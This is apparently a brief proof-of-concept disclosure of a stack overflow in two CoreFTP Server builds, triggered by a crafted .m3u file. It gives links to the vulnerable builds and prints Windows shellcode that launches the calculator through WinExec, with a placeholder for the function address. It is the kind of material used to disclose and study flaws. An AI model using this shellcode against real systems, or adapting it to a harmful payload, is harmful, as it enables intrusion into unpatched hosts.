In the name of Allah, the Most Gracious, the Most Merciful.
Description: A simple Stack Overflow that affects both of CoreFTP Server v2 (build 597 beta) and CoreFTP Server version 1.2 (build 587). This Stack Overflow was triggered by open the .m3u file with the vulnerable software.
Reference:
Vulnerable App:
- CoreFTP Server v2 (build 597 beta): http://www.firstsight.me/wp-content/uploads/2020/02/coreftpserver-v2.0-build597-beta.zip
- CoreFTP Server v1.2 (build 587): http://www.firstsight.me/wp-content/uploads/2020/02/CoreFTPServer-v1.2-build587.zip
Test at: Windows XP SP3.
Pop up the Calculator:
\x33\xc0\x50\x68\x2E\x65\x78\x65\x68\x63\x61\x6C\x63\x8B\xC4\x6A\x01\x50\xBB\xAD\x23\x86\x7C\xFF\xD3\x50\xBB\x??\x??\x??\x??\xFF\xD3
Replace the \x??\x??\x??\x?? with the value of Pointer to WinExec (by using arwin).